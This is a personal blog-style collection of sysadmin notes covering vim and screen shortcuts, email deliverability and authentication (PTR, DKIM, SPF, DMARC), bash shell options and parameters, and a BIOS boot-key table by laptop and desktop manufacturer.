Insert  - enter insert mode, so you can start typing. Alternatively one can use i or a.
Esc  - leave insert mode, so you can issue commands. Note in VIM the cursor keys & {Home, End, Page{up,down}} and Delete and Backspace work as expected in any mode, so you don't need to go back to command mode nearly as much as in the original vi. Note even Ctrl+{left,right} jumps words like most other editors. Note also Ctrl+[ and Ctrl+c are equivalent to Esc and may be easier to type. Also Ctrl+o in insert mode will switch to normal mode for one command only and automatically switch back.
:command  - runs named command
:help word  - shows help on word. Typing Ctrl+d after word shows all entries containing word.
:echo &word  - shows value of word
:e  - set buffer for current window. You can optionally specify a new file or existing buffer number (#3 for e.g.). Note if you specify a directory a file browser is started. E.g. :e . will start the browser in the current directory (which can be changed with the :cd command).
:sp  - new window above (ditto)
:vs  - new window to left (ditto)
:q  - close current window
:qa  - close all windows. Add trailing ! to force.
Ctrl+w {left,right,up,down}  - move to window
Ctrl+w Ctrl+w  - toggle window focus
Ctrl+w =  - autosize windows (to new terminal size for e.g.)
:ba  - new window for all buffers. ":vert ba" tiles windows vertically.
:ls  - list buffers
gf  - open file under cursor
:bd  - delete buffer (and any associated windows)
:w  - save file. Note :up[date] only writes the file if changes were made, but it's more awkward to type.
:sav filename  - save file as filename. Note :w filename doesn't switch to the new file; subsequent edits/saves happen to the existing file.
gg  - Goto start of file
G  - Goto end of file
:54  - Goto line 54
80|  - Goto column 80
Ctrl+g  - Show file info, including your position in the file
ga  - Show character info (g8 shows UTF8 encoding)
Ctrl+e  - scroll up (Ctrl+x needed first in insert mode)
Ctrl+y  - scroll down (Ctrl+x needed first in insert mode)
zt  - scroll current line to top of window
w  - Goto next word. Note Ctrl+{right} in newer vims (which works also in insert mode).
b  - Goto previous word. Note Ctrl+{left} in newer vims.
[{  - Goto previous { of current scope
%  - Goto matching #if #else, {}, (), [], /* */ (must be one on the line)
zi  - toggle folds on/off
m {a-z}  - mark position as {a-z}. E.g. m a
' {a-z}  - move to position {a-z}. E.g. ' a
' '  - move to previous position
'0  - open previous file (handy after starting vim)
v  - select visually (use cursor keys, home, end etc.)
Shift+v  - line select (CTRL+v = column select)
Delete  - cut selection
"_x  - delete selection, without updating the clipboard or yank buffer. I remap x to this in my .vimrc.
y  - copy selection
p  - paste (after cursor). P is paste before cursor.
"Ay  - append selected lines to register a (use lowercase a to initialise the register)
"ap  - paste contents of a
gq  - reformat selection; justifies text and is useful with :set textwidth=70 (80 is default)
=  - reindent selection (very useful to fix indentation for C code)
>  - indent section (useful with Shift+v%)
<  - unindent section (remember . to repeat and u to undo)
:set list!  - toggle visible whitespace. See also listchars in my .vimrc.
clipboard shortcuts
dd  - cut current line
yy  - copy current line
D  - cut to end of line
y$  - copy to end of line
/regexp  - searches forwards for regexp (? reverses direction)
n  - repeat previous search (N reverses direction)
*  - searches forward for word under cursor (# reverses direction)
:%s/1/2/gc  - search for regexp 1 and replace with 2 in file (c = confirm change)
:s/1/2/g  - search for regexp 1 and replace with 2 in (visual) selection
K  - lookup word under cursor in man pages (2K means lookup in section 2)
:make  - run make in current directory
Ctrl+]  - jump to tag. Ctrl+t to jump back levels. I map these to Alt+⇦⇨ in my .vimrc.
vim -t name  - Start editing where name is defined
Ctrl+{n,p}  - scroll forward/back through autocompletions for the word before the cursor. Uses words in the current file (and included files) by default; you can change to a dictionary, e.g.: set complete=k/usr/share/dicts/words. Note only works in insert mode.
Ctrl+x Ctrl+o  - scroll through language specific completions for the text before the cursor. "Intellisense" for vim (7 & later); :help compl-omni for more info. Useful for python, css, javascript, ctags, ... Note only works in insert mode.
external filters
:%!filter  - put whole file through filter
:!filter  - put (visual) selection through filter
:,!command  - replace current line with command output
map <f9> :w<CR>:!python %<CR>  - run current file with external program

Auteur : Harlok

2019-05-10 16:57:23

Screen keyboard shortcuts

screen is a much under utilised program, which provides the following functionality:
  • Remote terminal session management (detaching or sharing terminal sessions)
  • unlimited windows (unlike the hardcoded number of Linux virtual consoles)
  • scrollback buffer (not limited to video memory like Linux virtual consoles)
  • copy/paste between windows
  • notification of either activity or inactivity in a window
  • split terminal (horizontally and vertically) into multiple regions
  • locking other users out of terminal
  • See also the tmux alternative
See also the byobu screen config manager, and reptyr as another way to reattach programs to a terminal. Note for nested screen sessions, use "Ctrl+a a" to send commands to the inner screen, and the standard "Ctrl+a" to send commands to the outer screen.
Ctrl+a c  - new window
Ctrl+a n  - next window (I bind F12 to this)
Ctrl+a p  - previous window (I bind F11 to this)
Ctrl+a "  - select window from list (I have the window list in the status line)
Ctrl+a Ctrl+a  - previous window viewed
Ctrl+a S  - split terminal horizontally into regions (Ctrl+a c to create a new window there)
Ctrl+a |  - split terminal vertically into regions (requires screen >= 4.1)
Ctrl+a :resize  - resize region
Ctrl+a :fit  - fit screen size to new terminal size (Ctrl+a F is the same; do after resizing xterm)
Ctrl+a :remove  - remove region (Ctrl+a X is the same)
Ctrl+a tab  - Move to next region
Ctrl+a d  - detach screen from terminal (start screen with -r option to reattach)
Ctrl+a A  - set window title
Ctrl+a x  - lock session (enter user password to unlock)
Ctrl+a [  - enter scrollback/copy mode. Enter to start and end the copy region; Ctrl+a ] to leave this mode.
Ctrl+a ]  - paste buffer (supports pasting between windows)
Ctrl+a >  - write paste buffer to file (useful for copying between screens)
Ctrl+a <  - read paste buffer from file (useful for pasting between screens)
Ctrl+a ?  - show key bindings/command names (note unbound commands only in man page)
Ctrl+a :  - goto screen command prompt (up shows last command entered)

Auteur : Harlok

2019-05-10 16:45:43

So You'd Like to Send Some Email

Email is the cockroach of communication mediums: you just can't kill it. Email is the one method of online contact that almost everyone -- at least for that subset of "everyone" which includes people who can bear to touch a computer at all -- is guaranteed to have, and use.

So, reluctantly, we come to the issue of sending email through code. It's easy! Let's send some email through oh, I don't know, let's say ... Ruby, courtesy of some sample code I found while browsing the Ruby tag on Stack Overflow.

require 'net/smtp'

def send_email(to, subject = "", body = "")
  from = ""
  body = "From: #{from}\r\nTo: #{to}\r\nSubject: #{subject}\r\n\r\n#{body}\r\n"
  Net::SMTP.start('', 25, '') do |smtp|
    smtp.send_message body, from, to
  end
end

send_email "", "test", "blah blah blah"

There's a bug in this code, though. Do you see it?

Just because you send an email doesn't mean it will arrive. Not by a long shot. Bear in mind this is email we're talking about. It was never designed to survive a bitter onslaught of criminals and spam, not to mention the explosive, exponential growth it has seen over the last twenty years. Email is a well that has been truly and thoroughly poisoned -- the digital equivalent of a superfund cleanup site. The ecosystem around email is a dank miasma of half-implemented, incompletely supported anti-spam hacks and workarounds.

Which means the odds of that random email your code just sent getting to its specific destination are... spotty. At best.

If you want email your code sends to actually arrive in someone's AOL mailbox, to the dulcet tones of "You've Got Mail!", there are a few things you must do first. And most of them are only peripherally related to writing code.

1. Make sure the computer sending the email has a Reverse PTR record

What's a reverse PTR record? It's something your ISP has to configure for you -- a way of verifying that the email you send from a particular IP address actually belongs to the domain it is purportedly from.

Not every IP address has a corresponding PTR record. In fact, if you took a random sampling of addresses your firewall blocked because they were up to no good, you'd probably find most have no PTR record - a dig -x gets you no information. That's also apt to be true for mail spammers, or their PTR doesn't match up: if you do a dig -x on their IP you get a result, but if you look up that result you might not get the same IP you started with.

That's why PTR records have become important. Originally, PTR records were just intended as a convenience, and perhaps as a way to be neat and complete. There still are no requirements that you have a PTR record or that it be accurate, but because of the abuse of the internet by spammers, certain conventions have grown up. For example, you may not be able to send email to some sites if you don't have a valid PTR record, or if your pointer is "generic".

How do you get a PTR record? You might think that this is done by your domain registrar - after all, they point your domain to an IP address. Or you might think whoever handles your DNS would do this. But the PTR record isn't up to them, it's up to the ISP that "owns" the IP block it came from. They are the ones who need to create the PTR record.

A reverse PTR record is critical. How critical? Don't even bother reading any further until you've verified that your ISP has correctly configured the reverse PTR record for the server that will be sending email. It is absolutely the most common check done by mail servers these days. Fail the reverse PTR check, and I guarantee that a huge percentage of the emails you send will end up in the great bit bucket in the sky -- and not in the email inboxes you intended.
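The check mail servers perform is forward-confirmed reverse DNS: resolve the IP to a PTR name, then resolve that name back and compare. A rough shell sketch of that round-trip (not from the article; it assumes `dig` from bind-utils is installed, and the IP you pass in is your own):

```shell
# fcrdns IP: pass if IP -> PTR name -> same IP round-trips.
fcrdns() {
    local ip=$1 ptr fwd
    ptr=$(dig +short -x "$ip")        # reverse lookup, e.g. "mail.example.com."
    ptr=${ptr%.}                      # strip the trailing dot from the PTR name
    [ -n "$ptr" ] || { echo "no PTR record for $ip"; return 1; }
    fwd=$(dig +short "$ptr")          # forward lookup of the PTR name
    if [ "$fwd" = "$ip" ]; then
        echo "pass: $ip -> $ptr -> $fwd"
    else
        echo "fail: $ip -> $ptr -> ${fwd:-<no A record>}"
        return 1
    fi
}
# usage: fcrdns 203.0.113.10
```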

2. Configure DomainKeys Identified Mail in your DNS and code

What's DomainKeys Identified Mail? With DKIM, you "sign" every email you send with your private key, a key only you could possibly know. And this can be verified by attempting to decrypt the email using the public key stored in your public DNS records. It's really quite clever!

The first thing you need to do is generate some public-private key pairs (one for every domain you want to send email from) via OpenSSL. I used a win32 version I found. Issue these commands to produce the keys in the below files:

$ openssl genrsa -out rsa.private 1024
$ openssl rsa -in rsa.private -out rsa.public -pubout -outform PEM

These public and private keys are just big ol' Base64 encoded strings, so plop them in your code as configuration string resources that you can retrieve later.

Next, add some DNS records. You'll need two new TXT records.



    "k=rsa; p={public-key-base64-string-here}"

The first TXT DNS record is the global DomainKeys policy and contact email.

The second TXT DNS record is the public base64 key you generated earlier, as one giant unbroken string. Note that the "selector" part of this record can be anything you want; it's basically just a disambiguating string.
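For reference, the pair of records described above would look something like this in a zone file. Everything here is a hypothetical example (domain example.com, selector "mail", truncated key), not values from this article:

```text
; global DomainKeys policy and contact address
_domainkey.example.com.       IN TXT "t=y; o=~; r=postmaster@example.com"
; per-selector public key, as one unbroken base64 string
mail._domainkey.example.com.  IN TXT "k=rsa; p=MIGfMA0GCSqGSIb3...{rest-of-public-key}"
```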

Almost done. One last thing -- we need to sign our emails before sending them. In any rational world this would be handled by an email library of some kind. We use Mailbee.NET which makes this fairly painless:

smtp.Message = dk.Sign(smtp.Message,
null, AppSettings.Email.DomainKeyPrivate, false, "selector");

3. Set up a SPF / SenderID record in your DNS

To be honest, SenderID is a bit of a "nice to have" compared to the above two. But if you've gone this far, you might as well go the distance. SenderID, while a little antiquated and kind of.. Microsoft/Hotmail centric.. doesn't take much additional effort.

SenderID isn't complicated. It's another TXT DNS record at the root of your domain, which contains a specially formatted string documenting all the allowed IP addresses that mail can be expected to come from. Here's an example:

"v=spf1 a mx ip4: ip4: ~all"

You can use the Sender ID SPF Record Wizard to generate one of these for each domain you send email from.

That sucked. How do I know all this junk is working?

I agree, it sucked. Email sucks; what did you expect? I used two methods to verify that all the above was working:

  1. Test emails sent to a GMail account.

    Use the "show original" menu on the arriving email to see the raw message content as seen by the email server. You want to verify that the headers definitely contain the following:
    Received-SPF: pass
    Authentication-Results: ... spf=pass ... dkim=pass

    If you see that, then the Reverse PTR and DKIM signing you set up is working. Google provides excellent diagnostic feedback in their email server headers, so if something isn't working, you can usually discover enough of a hint there to figure out why.

  2. Test emails sent to the Port25 email verifier

    Port25 offers a really nifty public service -- you can send email to and it will reply to the from: address with an extensive diagnostic! Here's an example summary result from a test email I just sent to it:
    SPF check:          pass
    DomainKeys check: fail
    DKIM check: pass
    Sender-ID check: pass
    SpamAssassin check: ham

    You want to pass SPF, DKIM, and Sender-ID. Don't worry about the DomainKeys failure, as I believe it is spurious -- DKIM is the "newer" version of that same protocol.


Auteur : Harlok

2019-05-07 17:26:58

SPF, DKIM, DMARC: The 3 Pillars of Email Authentication

If you’re an email marketer, you’ve probably heard acronyms like “SPF,” “DKIM,” and “DMARC” being tossed around with little explanation. People might assume you automatically understand these terms, but the truth is that many marketers’ grasp of these concepts is vague, at best.

The good news is that SPF, DKIM, and DMARC can work together for you like a triple rainbow of email authentication, and that’s why we want you to have a thorough understanding of them. The explanations are technical, but these are three fundamental concepts to understand about email authentication. 

We’ll provide you with a brief and insightful look at each of these protocols, then you’ll be able to start tossing these acronyms around like the pros. First things first…

What is email authentication, and why is it so important?

Email authentication helps to improve the delivery and credibility of your marketing emails by implementing protocols that verify your domain as the sender of your messages.  

Using authentication won’t guarantee that your mail reaches the inbox but it preserves your brand reputation while making sure you have the best possible chance of having your messages reach their intended destination. 

Read on to find out how to ensure you’re achieving the gold standard of email authentication.

SPF, DKIM, and DMARC: 3 Technical, but Essential, Explanations

SPF: Sender Policy Framework

SPF, Sender Policy Framework, is a way for recipients to confirm the identity of the sender of an incoming email.

By creating an SPF record, you can designate which mail servers are authorized to send mail on your behalf. This is especially useful if you have a hosted email solution (Office365, Google Apps, etc.) or if you use an ESP like Higher Logic.

Here’s a brief synopsis of the process:

  1. The sender adds a record to the DNS settings.

    1. The record is for the domain used in their FROM: address (e.g. if I send from, add the record to This record includes all IP addresses (mail servers) that are authorized to send mail on behalf of this domain. A typical SPF record will look something like this:
      v=spf1 ip4: ip4: ip4: ~all

  2.  The receiving server checks the DNS records.

    1. When the mail is sent, the receiving server checks the DNS records for the domain in the FROM: field. If the IP address is listed in that record (as seen above), the message passes SPF.

  3. If SPF exists, but the IP address isn't in the record, it's a hard fail.

    1. If the SPF record exists, but the IP address of the sending mail server isn’t in the record, it’s considered a “hard-fail.” This can often cause mail to be rejected or routed to the spam folder.

  4. If no SPF record exists, it's a soft fail.

    1. If no SPF record exists at all, this is considered a “soft-fail.” These are most likely to cause messages to be routed to spam but can lead to a message being rejected as well.
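The receiving server's check in step 2 can be approximated with a small shell function. This is a simplified sketch of my own (it only handles exact `ip4:` matches, not `a`, `mx`, CIDR ranges, or `include:`), and the domain and IP are placeholders; it assumes `dig` is available:

```shell
# spf_check DOMAIN IP: does DOMAIN's SPF record list IP as an ip4: mechanism?
spf_check() {
    local rec
    # fetch the TXT records, strip quotes, keep the v=spf1 one
    rec=$(dig +short TXT "$1" | tr -d '"' | grep '^v=spf1')
    case " $rec " in
        *" ip4:$2 "*) echo "pass" ;;
        *)            echo "no match (soft/hard fail depends on the all mechanism)" ;;
    esac
}
# usage: spf_check example.com 203.0.113.10
```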

DKIM: DomainKeys Identified Mail

DKIM, short for DomainKeys Identified Mail, also allows for the identification of “spoofed” emails, but using a slightly different process. Instead of a single DNS record that keys off the FROM: address, DKIM employs two encryption keys: one public and one private.

The private key is housed in a secure location that can only be accessed by the owner of the domain. This private key is used to create an encrypted signature that is added to every message sent from that domain. Using the signature, the receiver of the message can check against the public DKIM key, which is stored in a public-facing DNS record. If the records “match,” the mail could only have been sent by the person with access to the private key, aka the domain owner.  

DMARC: Domain-based Message Authentication, Reporting, & Conformance

While SPF and DKIM can be used as stand-alone methods, DMARC must rely on either SPF or DKIM to provide the authentication.

DMARC (Domain-based Message Authentication, Reporting, & Conformance) builds on those technologies by providing directions to the receiver on what to do if a message from your domain is not properly authenticated.

Like SPF and DKIM, DMARC also requires a specific DNS record to be entered for the domain you wish to use in your FROM: address. This record can include several values, but only two are required:

  • (v) tells the receiving server to check DMARC

  • (p) gives instructions on what to do if authentication fails.

The values for p can include:

  • p=none, which tells the receiving server to take no specific action if authentication fails.

  • p=quarantine, which tells the receiving server to treat unauthenticated mail suspiciously. This could mean routing the mail to spam/junk, or adding a flag indicating the mail is not trusted.

  • p=reject, which tells the receiving server to reject any mail that does not pass SPF and/or DKIM authentication.

In addition to the required tags advising how to handle unauthenticated mail, DMARC also provides a reporting component that can be very useful for most organizations. By enabling the reporting features of DMARC, your organization can receive reports indicating all mail that is being sent with your domain in the FROM: address. This can help identify spoofed or falsified mail patterns as well as tracking down other business divisions or partners that may be legitimately sending mail on your behalf without authentication.
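Putting the two required tags together with the optional reporting tag, a DMARC record and a trivial parser for its policy might look like this. The record below is a hypothetical example for example.com, not one taken from the article:

```shell
# A hypothetical DMARC record, as it would appear in the TXT record
# published at _dmarc.example.com:
record='v=DMARC1; p=quarantine; rua=mailto:dmarc-reports@example.com'

# dmarc_policy RECORD: print the value of the p= tag.
dmarc_policy() {
    # drop spaces, split tags on ';', keep only the p= value
    echo "$1" | tr -d ' ' | tr ';' '\n' | sed -n 's/^p=//p'
}

dmarc_policy "$record"   # prints: quarantine
```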


Auteur : Harlok

2019-05-07 14:46:08

Setting shell options

  • Task: Make changes to your bash shell environment using set and shopt commands.

  • The set and shopt commands control several variables that govern shell behavior.


List currently configured shell options

Type the following command:

set -o

Sample outputs:

allexport      	off
braceexpand on
emacs on
errexit off
errtrace off
functrace off
hashall on
histexpand on
history on
ignoreeof off
interactive-comments on
keyword off
monitor on
noclobber off
noexec off
noglob off
nolog off
notify off
nounset off
onecmd off
physical off
pipefail off
posix off
privileged off
verbose off
vi off
xtrace off

  • See set command for detailed explanation of each variable.

How do I set and unset shell variable options?

To set shell variable option use the following syntax:

set -o variableName

To unset shell variable option use the following syntax:

set +o variableName


Disable <CTRL-d> which is used to logout of a login shell (local or remote login session over ssh).

set -o ignoreeof

Now, try pressing [CTRL-d]
Sample outputs:

Use "exit" to leave the shell.

Turn it off, enter:

set +o ignoreeof
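Another option worth trying the same way is noclobber, which stops `>` redirection from silently overwriting existing files (this example is mine, not from the original article; the file name is a throwaway):

```shell
set -o noclobber
echo "first" > demo.txt                  # creates the file
( echo "second" > demo.txt ) 2>/dev/null \
    || echo "overwrite refused"          # plain > is now blocked
echo "third" >| demo.txt                 # >| explicitly overrides noclobber
cat demo.txt                             # prints: third
set +o noclobber
rm -f demo.txt
```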

shopt command

You can turn on or off the values of variables controlling optional behavior using the shopt command. To view a list of the currently configured options via shopt, enter:

shopt -p

Sample outputs:

cdable_vars    	off
cdspell off
checkhash off
checkwinsize on
cmdhist on
compat31 off
dotglob off
execfail off
expand_aliases on
extdebug off
extglob off
extquote on
failglob off
force_fignore on
gnu_errfmt off
histappend off
histreedit off
histverify off
hostcomplete on
huponexit off
interactive_comments on
lithist off
login_shell off
mailwarn off
no_empty_cmd_completion off
nocaseglob off
nocasematch off
nullglob off
progcomp on
promptvars on
restricted_shell off
shift_verbose off
sourcepath on
xpg_echo off

How do I enable (set) and disable (unset) each option?

To enable (set) each option, enter:

shopt -s optionName

To disable (unset) each option, enter:

shopt -u optionName


If the cdspell option is set, minor errors in the spelling of a directory name in a cd command will be corrected. The errors checked for are transposed characters, a missing character, and one character too many. If a correction is found, the corrected directory name is printed, and the command proceeds. For example, type the command (note the /etc directory spelling):

cd /etcc

Sample outputs:

bash: cd: /etcc: No such file or directory

Now, turn on cdspell option and try again the same cd command, enter:

shopt -s cdspell
cd /etcc

Sample outputs:

[vivek@vivek-desktop /etc]$

Customizing Bash environment with shopt and set

Edit your ~/.bashrc, enter:

vi ~/.bashrc

Add the following commands:

# Correct dir spellings
shopt -q -s cdspell

# Make sure display get updated when terminal window get resized
shopt -q -s checkwinsize

# Turn on the extended pattern matching features
shopt -q -s extglob

# Append rather than overwrite history on exit
shopt -s histappend

# Save multi-line commands as single history entries
shopt -q -s cmdhist

# Get immediate notification of background job termination
set -o notify

# Disable [CTRL-D] which is used to exit the shell
set -o ignoreeof

# Disable core files
ulimit -S -c 0 > /dev/null 2>&1

How do I setup environment variables?

Simply add the settings to ~/.bashrc:

 # Store 5000 commands in history buffer
export HISTSIZE=5000

# Store 5000 commands in history FILE
export HISTFILESIZE=5000

# Avoid duplicates in history
export HISTIGNORE='&:[ ]*'

# Use less command as a pager
export PAGER=less

# Set vim as default text editor
export EDITOR=vim
export VISUAL=vim

# Oracle database specific
export ORACLE_HOME=/usr/lib/oracle/xe/app/oracle/product/10.2.0/server
export NLS_LANG=$($ORACLE_HOME/bin/

export JAVA_HOME=/usr/lib/jvm/java-6-sun/jre

# Add ORACLE, JAVA and ~/bin bin to PATH

# Secure SSH login stuff using keychain
# No need to input password again ever
/usr/bin/keychain $HOME/.ssh/id_dsa
source $HOME/.keychain/$HOSTNAME-sh

# Turn on Bash command completion
source /etc/bash_completion

# MS-DOS / XP cmd like stuff
alias edit=$VISUAL
alias copy='cp'
alias cls='clear'
alias del='rm'
alias dir='ls'
alias md='mkdir'
alias move='mv'
alias rd='rmdir'
alias ren='mv'
alias ipconfig='ifconfig'

# Other Linux stuff
alias bc='bc -l'
alias diff='diff -u'

# get updates from RHN
alias update='yum -y update'

# set eth1 as default
alias dnstop='dnstop -l 5 eth1'
alias vnstat='vnstat -i eth1'

# force colorful grep output
alias grep='grep --color'

# ls stuff
alias l.='ls -d .* --color=tty'
alias ll='ls -l --color=tty'
alias ls='ls --color=tty'


Auteur : Harlok

2019-05-10 16:43:07

Bash parameters (translated from French)



A script can be given the arguments it needs to run on the command line. These arguments are called "parameters".

There are two categories of them: positional parameters and special parameters.

Positional parameters

These are quite simply the arguments passed as "parameters" on the command line when a script is invoked.

They are assigned to the reserved variables 1, 2, 3, ... 9, 10, 11, ... and can be referenced with the expressions $1, $2, $3, ... $9, ${10}, ${11}, ...

Note: the Bourne shell is limited to parameters 0 through 9.

Example 1

Here is a small script that simply prints some of the arguments passed as parameters, according to their position.


echo "The 1st parameter is: $1"
echo "The 3rd parameter is: $3"
echo "The 10th parameter is: ${10}"
echo "The 15th parameter is: ${15}"

Then simply invoke the script, passing it a number of parameters:

./ 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17

The 1st parameter is: 1
The 3rd parameter is: 3
The 10th parameter is: 10
The 15th parameter is: 15
or again:
./ un 2 trois 4 5 6 7 8 9 dix 11 12 13 14 quinze 16 17
The 1st parameter is: un
The 3rd parameter is: trois
The 10th parameter is: dix
The 15th parameter is: quinze

If some parameters contain special characters or spaces, they must be quoted:

./ un 2 "le 3ème" 4 5 6 7 8 9 dix 11 12 13 14 "le 15ème" 16 17
The 1st parameter is: un
The 3rd parameter is: le 3ème
The 10th parameter is: dix
The 15th parameter is: le 15ème

Special parameters

These are also reserved variables; some of them perform operations on the parameters themselves.

These parameters are the following:

$0  contains the name of the script as it was invoked

$*  all the parameters, as a single argument

$@  all the arguments, one argument per parameter

$#  the number of parameters passed to the script

$?  the return code of the last command

$$  the PID of the shell executing the script

$!  the PID of the last process started in the background

Example 2

Here is another small script using all of the special parameters described above.

# Print the script name
echo "The name of my script is: $0"
# Print the number of parameters
echo "You passed $# parameters"
# List of parameters (as a single argument)
for param in "$*"; do
    echo "Here is the list of parameters (a single argument): $param"
done
# List of parameters (one parameter per argument)
echo "Here is the list of parameters (one parameter per argument):"
for param in "$@"; do
    echo -e "\tParameter: $param"
done
# Print the shell's PID
echo "The PID of the shell executing the script is: $$"
# Run a command in the background
sleep 100 &
# Print the PID of the background process
echo "The PID of the last command run in the background is: $!"
# Print the return code of the last "echo" command
echo "The return code of the previous command is: $?"
# Generate an error
echo "Generating an error..."
# Show the bad command
echo "ls /etc/password 2>/dev/null"
ls /etc/password 2>/dev/null
# Print the return code of the last command
echo "The return code of the previous command is: $?"
Which gives, with the following invocation:
./ 1 2 3 quatre 5 six

The name of my script is: ./
You passed 6 parameters
Here is the list of parameters (a single argument): 1 2 3 quatre 5 six
Here is the list of parameters (one parameter per argument):
Parameter: 1
Parameter: 2
Parameter: 3
Parameter: quatre
Parameter: 5
Parameter: six
The PID of the shell executing the script is: 6165
The PID of the last command run in the background is: 6166
The return code of the previous command is: 0
Generating an error...
ls /etc/password 2>/dev/null
The return code of the previous command is: 1

Initializing parameters

- The "set" command -

Parameters can be assigned directly to the shell with the set command.

A simple command such as:
set param1 param2 param3
automatically initializes the positional parameters $1, $2 and $3
with the values param1, param2 and param3, erasing any previous values they may have held. The special parameters $#, $* and $@
are automatically updated accordingly.


$ set param1 param2 param3
$ echo "Number of parameters: $#"
Number of parameters: 3
$ echo "The second parameter is: $2"
The second parameter is: param2
$ echo "The parameters are: $@"
The parameters are: param1 param2 param3

$ set pêche pomme
$ echo "Number of parameters: $#"
Number of parameters: 2
$ echo "The parameters are: $@"
The parameters are: pêche pomme

This feature can be useful when processing a file line by line, to isolate each word (field) and format the output.

$ IFS=":"; set $(grep $USER /etc/passwd)
$ echo -e "Login:\t$1\nName:\t$5\nID:\t$3\nGroup:\t$4\nShell:\t$7"

Login : jp
Name : Jean-Philippe
ID : 500
Group : 500
Shell : /bin/bash

- The "shift" command -

The shift builtin shifts the parameters.

The value of the 1st parameter ($1) is replaced by the value of the 2nd parameter ($2), that of the 2nd ($2) by that of the 3rd ($3), and so on.

An argument (shift [n]) gives the number of positions by which to shift the parameters.

Example 3

Here is a demonstration of the shift builtin.


echo "Number of parameters: $#"
echo "The 1st parameter is: $1"
echo "The 3rd parameter is: $3"
echo "The 6th parameter is: $6"
echo "The 10th parameter is: ${10}"
echo "============================================="
echo "Shifting one position with the \"shift\" command"
shift
echo "Number of parameters: $#"
echo "The 1st parameter is: $1"
echo "The 3rd parameter is: $3"
echo "The 6th parameter is: $6"
echo "The 10th parameter is: ${10}"
echo "============================================="
echo "Shifting four positions with the \"shift 4\" command"
shift 4
echo "Number of parameters: $#"
echo "The 1st parameter is: $1"
echo "The 3rd parameter is: $3"
echo "The 6th parameter is: $6"
echo "The 10th parameter is: ${10}"
And its result:
./ 1 2 3 4 5 6 7 8 9 10

Number of parameters: 10
The 1st parameter is: 1
The 3rd parameter is: 3
The 6th parameter is: 6
The 10th parameter is: 10
=============================================
Shifting one position with the "shift" command
Number of parameters: 9
The 1st parameter is: 2
The 3rd parameter is: 4
The 6th parameter is: 7
The 10th parameter is:
=============================================
Shifting four positions with the "shift 4" command
Number of parameters: 5
The 1st parameter is: 6
The 3rd parameter is: 8
The 6th parameter is:
The 10th parameter is:

Original article published by Carlos Villagómez. Translated into French by jipicy.
Last updated on 1 June 2017 at 17:02 by avenuepopulaire.

This document, entitled "Bash - Les paramètres", from CommentCaMarche ( is made available under the terms of the Creative Commons license.
You may copy and modify copies of this page, under the conditions set by the license, as long as this notice clearly appears.

Auteur : Harlok

2019-05-10 16:39:25

How to access to boot menu, bios or UEFI

Manufacturer | Type | Models | Boot Menu | Boot Once | BIOS/UEFI Key | Change Priority
Acer Esc, F12, F9 Del, F2
Acer netbook Aspire One zg5, zg8 F12 F2
Acer netbook Aspire Timeline F12 F2
Acer netbook Aspire v3, v5, v7 F12 The "F12 Boot Menu" must be enabled in BIOS. It is disabled by default. F2
Apple After 2006 Option
Asus desktop F8 F9
Asus laptop VivoBook f200ca, f202e, q200e, s200e, s400ca, s500ca, u38n, v500ca, v550ca, v551, x200ca, x202e, x550ca, z202e Esc Delete
Asus laptop N550JV, N750JV, N550LF, Rog g750jh, Rog g750jw, Rog g750jx Esc Disable "Fast Boot" and "Secure Boot Control" in order to boot from MBR formatted media. F2
Asus laptop Zenbook Infinity ux301, Infinity ux301la, Prime ux31a, Prime ux32vd, R509C, Taichi 21, Touch u500vz, Transformer Book TX300 Esc Disable "Fast Boot" and "Secure Boot Control" in order to boot from MBR formatted media. F2
Asus notebook k25f, k35e, k34u, k35u, k43u, k46cb, k52f, k53e, k55a, k60ij, k70ab, k72f, k73e, k73s, k84l, k93sm, k93sv, k95vb, k501, k601, R503C, x32a, x35u, x54c, x61g, x64c, x64v, x75a, x83v, x83vb, x90, x93sv, x95gl, x101ch, x102ba, x200ca, x202e, x301a, x401a, x401u, x501a, x502c, x750ja F8 DEL
Asus netbook Eee PC 1015, 1025c Esc F2 Boot Tab, Boot Device Priority, 1st Boot Device, Removable Device, F10
Compaq Presario Esc, F9 F10 BIOS "Advanced Tab", Boot Order
Dell desktop Dimension, Inspiron, Latitude, Optiplex F12 Select "USB Flash Drive". F2
Dell desktop Alienware Aurora, Inspiron One 20, Inspiron 23 Touch, Inspiron 620, 630, 650, 660s, Inspiron 3000, X51, XPS 8300, XPS 8500, XPS 8700, XPS 18 Touch, XPS 27 Touch F12 Select "USB Flash Drive". F2
Dell desktop Inspiron One 2020, 2305, 2320, 2330 All-In-One F12 Select "USB Flash Drive". F2
Dell laptop Inspiron 11 3000 series touch, 14z Ultrabook, 14 7000 series touch, 15z Ultrabook touch, 15 7000 series touch, 17 7000 series touch F12 Select "USB Storage Device" F2 Settings->General->Boot Sequence->"USB Storage Device", then up arrow, [Apply]--[Exit]
Dell laptop Inspiron 14R non-touch, 15 non-touch, 15R non-touch, 17 non-touch, 17R non-touch F12 Select "USB Storage Device" F2 Settings->General->Boot Sequence->"USB Storage Device", then up arrow, [Apply]--[Exit]
Dell laptop Latitude c400, c600, c640, d610, d620, d630, d830, e5520, e6320, e6400, e6410, e6420, e6430, e6500, e6520, 6430u Ultrabook, x300 F12 Select "USB Storage Device" from boot menu. F2
Dell laptop Precision m3800, m4400, m4700, m4800, m6500, m6600, m6700, m6800 F12 Select "USB Storage Device" from boot menu. F2
Dell laptop Alienware 14, Alienware 17, Alienware 18, XPS 11 2-in-1, XPS 12 2-in-1, XPS 13, XPS 14 Ultrabook, XPS 15 Touch, F12 Select "USB Storage Device" from boot menu. F2
eMachines F12 Tab, Del
Fujitsu F12 F2
HP generic Esc, F9 Esc, F10, F1
HP desktop Pavilion Media Center a1477c Esc F10 BIOS "Advanced" tab, Boot Order, Move "USB Device" before "Hard Drive"
HP desktop Pavilion 23 All In One Esc Select boot media from the menu. F10 UEFI/BIOS "Advanced" tab, Boot Order, Move "USB Device" before "Hard Drive". For non-UEFI media, disable secure boot and enable legacy support.
HP desktop Pavilion Elite e9000, e9120y, e9150t, e9220y, e9280t Esc, F9 F10
HP desktop Pavilion g6 and g7 Esc F10 UEFI/BIOS "Advanced" tab, Boot Order, Move "USB Device" before "Hard Drive"
HP desktop Pavilion HPE PC, h8-1287c Esc Then F9 for "Boot Menu" Esc F10, Storage tab, Boot Order, Legacy Boot Sources
HP desktop Pavilion PC, p6 2317c Esc Then F9 for "Boot Menu" Esc F10, Storage tab, Boot Order, Legacy Boot Sources
